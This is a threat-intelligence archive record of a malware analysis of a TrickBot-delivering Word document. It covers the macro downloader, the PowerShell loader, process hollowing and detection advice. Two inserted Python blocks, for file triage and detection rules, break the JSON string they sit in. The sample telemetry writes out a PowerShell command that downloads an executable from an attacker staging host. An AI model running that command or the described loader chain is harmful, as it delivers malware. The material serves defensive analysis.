{
	"id": "a9997eb5-d4c9-4505-bb34-e6b543f3c391",
	"created_at": "2026-04-06T00:07:52.635771Z",
	"updated_at": "2026-04-10T03:21:10.952509Z",
	"deleted_at": null,
	"sha1_hash": "793a6e943cb8d33d67346a6323b19af1382a0970",
	"title": "TrickBot Banking Trojan - DOC00039217.doc",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 164227,
	"plain_text": "TrickBot Banking Trojan - DOC00039217.doc\r\nArchived: 2026-04-05 16:54:03 UTC\r\nDOC00039217.doc is a malicious Word document that uses VBA macros to start a multi-stage infection chain that ends with the TrickBot banking trojan.\r\nFilename: DOC00039217.doc\r\nMD5: 31529e5221e16a522e8aece4998036d7\r\nSample: Download via Reverse.it\r\nTechnical Analysis Walkthrough\r\nStage 1: Document \u0026 VBA Analysis\r\nInspecting the file header shows a \"PK\" (ZIP) signature and XML part references, so despite the .doc extension this is an Office Open XML package, specifically a macro-enabled DOCM. Word opens a file according to its content rather than its extension, so the masquerade costs the attacker nothing. Renaming the file to .zip (or opening it with any ZIP tool) exposes the package contents.\r\nThe word/vbaProject.bin part holds the primary downloader macro. vbaProject.bin is itself an OLE2 compound file whose module streams are stored compressed, so a tool such as olevba from oletools is the practical way to dump the source. When the macro runs it requests http://appenzeller.fr/aaaa to fetch the second stage.\r\nhttps://www.ringzerolabs.com/2017/07/trickbot-banking-trojan-doc00039217doc.html\r\nPage 1 of 4\n\nStage 2: VBScript \u0026 PowerShell Loader\r\nThe downloaded file aaaa is a VBScript that uses the Wscript.Shell object to launch PowerShell. The PowerShell command assembles the URL amphibiousvehicle.eu/0chb7 at run time and downloads the final payload from it.\r\nThe payload is written to the %TEMP% folder as petya.exe. Despite the name, this is not the Petya ransomware but the TrickBot trojan.\r\nUnpacking the Payload (PECompact2)\r\nThe binary is packed with PECompact2. To find the Original Entry Point (OEP), load the file in a debugger, let the unpacking stub run, and follow the last JMP instruction before the null-byte padding; it transfers control to the unpacked code, which can then be dumped.\r\nPersistence \u0026 Process Hollowing\r\nThe malware copies itself to the %AppData%\\Roaming\\winapp directory as odsxa.exe.\r\n
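A worked example of the Stage 1 triage described above, added here and not part of the original write-up: it classifies an Office file by its leading bytes rather than its extension, reports whether an OOXML package carries a vbaProject.bin part, flags the .doc-over-OOXML masquerade, and compares the MD5 with the sample hash listed above. The zipped stand-in document it builds is constructed for the example and is not the real DOC00039217.doc, so its hash is not expected to match.

```python
import hashlib
import io
import zipfile

# MD5 of the real DOC00039217.doc sample, taken from the write-up above.
KNOWN_SAMPLE_MD5 = '31529e5221e16a522e8aece4998036d7'

OLE2_MAGIC = bytes.fromhex('d0cf11e0a1b11ae1')   # legacy binary Office (compound file)
ZIP_MAGIC = bytes.fromhex('504b0304')           # PK..: Office Open XML package
LEGACY_EXTS = {'doc', 'dot', 'xls', 'xlt', 'ppt', 'pot'}
OOXML_MACRO_EXTS = {'docm', 'dotm', 'xlsm', 'xltm', 'xlam', 'pptm', 'potm', 'ppam'}
OOXML_EXTS = OOXML_MACRO_EXTS | {'docx', 'dotx', 'xlsx', 'xltx', 'pptx', 'potx'}


def find_vba_parts(data):
    '''Names of vbaProject.bin parts inside an OOXML package.'''
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return [n for n in zf.namelist() if n.lower().endswith('vbaproject.bin')]


def extract_vba_project(data):
    '''Raw bytes of the first vbaProject.bin part, or None when the package has none.
    The part is an OLE2 compound file with compressed module streams; decompressing
    them (e.g. with olevba) is a separate step.'''
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if name.lower().endswith('vbaproject.bin'):
                return zf.read(name)
    return None


def triage_document(filename, data):
    '''Classify an Office file by content signature, not extension, and report
    VBA presence, extension masquerades and a match against the known sample.'''
    ext = filename.rsplit('.', 1)[-1].lower() if '.' in filename else ''
    result = {'filename': filename, 'md5': hashlib.md5(data).hexdigest(),
              'container': 'unknown', 'has_vba': False, 'vba_parts': [],
              'extension_mismatch': False}
    result['known_sample'] = result['md5'] == KNOWN_SAMPLE_MD5
    if data.startswith(ZIP_MAGIC):
        result['container'] = 'ooxml'
        result['vba_parts'] = find_vba_parts(data)
        result['has_vba'] = bool(result['vba_parts'])
        # Word opens by content, so OOXML behind a legacy extension is a masquerade,
        # and an OOXML package carrying VBA should only ever use a macro-enabled type.
        result['extension_mismatch'] = ext in LEGACY_EXTS or (
            result['has_vba'] and ext not in OOXML_MACRO_EXTS)
    elif data.startswith(OLE2_MAGIC):
        result['container'] = 'ole2'
        result['extension_mismatch'] = ext in OOXML_EXTS
        # Macro detection inside OLE2 needs a compound-file parser (e.g. olefile); not done here.
    return result


def build_sample_ooxml(with_vba):
    '''Constructed stand-in for DOC00039217.doc: a minimal OOXML package, not the real sample.'''
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, 'w', zipfile.ZIP_DEFLATED) as zf:
        zf.writestr('[Content_Types].xml', '<Types/>')
        zf.writestr('word/document.xml', '<w:document/>')
        if with_vba:
            # A real vbaProject.bin starts with the OLE2 magic; the rest is filler here.
            zf.writestr('word/vbaProject.bin', OLE2_MAGIC + bytes(512))
    return buf.getvalue()


if __name__ == '__main__':
    sample = build_sample_ooxml(with_vba=True)
    print(triage_document('DOC00039217.doc', sample))
```

Extracting word/vbaProject.bin is only the first step of the analysis described above: the returned bytes are an OLE2 container with compressed module streams, so hand them to olevba (oletools) or an equivalent decompressor to read the downloader macro and recover the http://appenzeller.fr/aaaa request.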
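The Stage 2 loader chain, the %AppData%\\Roaming\\winapp persistence and the hollowed svchost.exe described in this write-up can all be caught from ordinary process-creation and file-creation telemetry. The detection logic below is an added example, not code from the original post; it runs over a constructed event sequence that mirrors the chain (WINWORD.EXE to wscript.exe to powershell.exe to petya.exe to odsxa.exe to svchost.exe) plus two benign events. The PowerShell command line and the aaaa.vbs file name are assumptions made for the sample events; only the URL, file names and directories come from the write-up, and paths are kept in the environment-variable form the write-up uses rather than expanded per-user paths.

```python
import ntpath

# Constructed sample telemetry standing in for Sysmon process-creation (EventID 1)
# and file-creation (EventID 11) records. The PowerShell command line and the
# aaaa.vbs name are assumptions; the last two events are benign controls.
POWERSHELL = 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'
WINWORD = 'C:\\Program Files\\Microsoft Office\\Office16\\WINWORD.EXE'
WSCRIPT = 'C:\\Windows\\System32\\wscript.exe'
SVCHOST = 'C:\\Windows\\System32\\svchost.exe'
EVENTS = [
    {'type': 'process', 'pid': 4120, 'image': WINWORD, 'parent_image': 'C:\\Windows\\explorer.exe',
     'cmdline': 'WINWORD.EXE /n DOC00039217.doc'},
    {'type': 'process', 'pid': 4188, 'image': WSCRIPT, 'parent_image': WINWORD,
     'cmdline': 'wscript.exe %TEMP%\\aaaa.vbs'},
    {'type': 'process', 'pid': 4204, 'image': POWERSHELL, 'parent_image': WSCRIPT,
     'cmdline': '''powershell -w hidden -c (New-Object Net.WebClient).DownloadFile('http://amphibiousvehicle.eu/0chb7', $env:TEMP + '\\petya.exe')'''},
    {'type': 'file', 'pid': 4204, 'image': POWERSHELL, 'target': '%TEMP%\\petya.exe'},
    {'type': 'process', 'pid': 4230, 'image': '%TEMP%\\petya.exe', 'parent_image': POWERSHELL,
     'cmdline': 'petya.exe'},
    {'type': 'file', 'pid': 4230, 'image': '%TEMP%\\petya.exe',
     'target': '%AppData%\\Roaming\\winapp\\odsxa.exe'},
    {'type': 'process', 'pid': 4250, 'image': SVCHOST,
     'parent_image': '%AppData%\\Roaming\\winapp\\odsxa.exe', 'cmdline': SVCHOST},
    # benign: a real service host started by the Service Control Manager
    {'type': 'process', 'pid': 904, 'image': SVCHOST,
     'parent_image': 'C:\\Windows\\System32\\services.exe', 'cmdline': SVCHOST + ' -k netsvcs -p'},
    # benign: an interactive PowerShell session
    {'type': 'process', 'pid': 5000, 'image': POWERSHELL, 'parent_image': 'C:\\Windows\\explorer.exe',
     'cmdline': 'powershell.exe'},
]

SCRIPT_HOSTS = {'wscript.exe', 'cscript.exe'}
OFFICE_APPS = {'winword.exe', 'excel.exe', 'powerpnt.exe'}
OFFICE_CHILDREN = SCRIPT_HOSTS | {'powershell.exe', 'cmd.exe', 'mshta.exe', 'rundll32.exe'}
DOWNLOAD_MARKERS = ('downloadfile', 'downloadstring', 'net.webclient',
                    'invoke-webrequest', 'start-bitstransfer', 'http://', 'https://')
PERSISTENCE_DIRS = ('%appdata%\\roaming\\winapp\\',)          # directory named in the write-up
USER_WRITABLE = ('%temp%\\', '%appdata%\\', '%localappdata%\\')
# Legitimate svchost.exe is started by services.exe; extend only after baselining.
ALLOWED_SVCHOST_PARENTS = {'services.exe'}


def image_name(path):
    '''Lower-cased file name of a Windows path (ntpath understands the backslashes).'''
    return ntpath.basename(path).lower()


def detect(events):
    '''Return (rule, pid) pairs, in event order, for every rule an event matches.'''
    hits = []
    for ev in events:
        if ev['type'] == 'process':
            img = image_name(ev['image'])
            parent = image_name(ev['parent_image'])
            cmd = ev['cmdline'].lower()
            # Office application spawning a script interpreter or shell: macro execution.
            if parent in OFFICE_APPS and img in OFFICE_CHILDREN:
                hits.append(('office-spawns-script-host', ev['pid']))
            # Script host invoking PowerShell with a download primitive: the Stage 2 loader.
            if img == 'powershell.exe' and parent in SCRIPT_HOSTS and any(m in cmd for m in DOWNLOAD_MARKERS):
                hits.append(('script-host-powershell-download', ev['pid']))
            # A hollowed svchost.exe keeps the trusted on-disk image, so the parent and
            # the missing -k <group> argument are what give it away.
            if img == 'svchost.exe' and (parent not in ALLOWED_SVCHOST_PARENTS or ' -k ' not in cmd + ' '):
                hits.append(('svchost-anomalous-parent-or-cmdline', ev['pid']))
            # Executable launched from a user-writable staging directory (petya.exe, odsxa.exe).
            if ev['image'].lower().startswith(USER_WRITABLE) and img.endswith('.exe'):
                hits.append(('exe-launched-from-user-writable-dir', ev['pid']))
        elif ev['type'] == 'file':
            target = ev['target'].lower()
            if target.startswith(PERSISTENCE_DIRS):
                hits.append(('write-to-known-persistence-dir', ev['pid']))
            elif target.startswith(USER_WRITABLE) and target.endswith('.exe') and image_name(ev['image']) == 'powershell.exe':
                hits.append(('powershell-drops-exe', ev['pid']))
    return hits


if __name__ == '__main__':
    for rule, pid in detect(EVENTS):
        print(f'{rule:45} pid={pid}')
```

The svchost.exe rule keys on the parent process and the command line rather than the image path because hollowing leaves the legitimate binary on disk untouched; baseline ALLOWED_SVCHOST_PARENTS in the target environment before turning the rule into an alert.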
It uses process hollowing to run inside a legitimate svchost.exe: a new svchost.exe is started suspended, its in-memory image is replaced with the TrickBot code, and the main thread is resumed. The hollowed process runs with the token of the odsxa.exe process that created it, not as a service account, but it carries the trusted svchost.exe image path and name, so path-based allowlists and a casual look at the process list see only a normal Windows process.\r\nC2 Communication \u0026 Modular Payload\r\nThe injected process first looks up the victim's public IP address via ipinfo.io/ip, then beacons to several hard-coded C2 IP addresses over HTTPS.\r\nOver time it downloads encrypted modules into a \\modules folder, extending the bot with credential-theft and banking-fraud capabilities.\r\nConclusion \u0026 Detection\r\nThis multi-stage campaign shows the evolution of TrickBot as the successor to Dyreza. The combination of a macro dropper, a VBScript-to-PowerShell loader and encrypted, on-demand modules makes it a flexible and dangerous threat.\r\nBest Practices:\r\nBlock the known C2 IPs at the perimeter, together with the staging hosts seen in this chain (appenzeller.fr and amphibiousvehicle.eu).\r\nDisable Office macros by default and allow them only for documents from verified senders, for example through signed macros or trusted locations.\r\nAlert on svchost.exe instances whose parent is not services.exe or whose command line lacks the usual -k <group> argument, and on executables written to or launched from %AppData% (including the winapp directory) and %TEMP%.\r\nFurther Reading: MalwareBytes | Fidelis Security\r\nSource: https://www.ringzerolabs.com/2017/07/trickbot-banking-trojan-doc00039217doc.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://www.ringzerolabs.com/2017/07/trickbot-banking-trojan-doc00039217doc.html"
	],
	"report_names": [
		"trickbot-banking-trojan-doc00039217doc.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434072,
	"ts_updated_at": 1775791270,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/793a6e943cb8d33d67346a6323b19af1382a0970.pdf",
		"text": "https://archive.orkl.eu/793a6e943cb8d33d67346a6323b19af1382a0970.txt",
		"img": "https://archive.orkl.eu/793a6e943cb8d33d67346a6323b19af1382a0970.jpg"
	}
}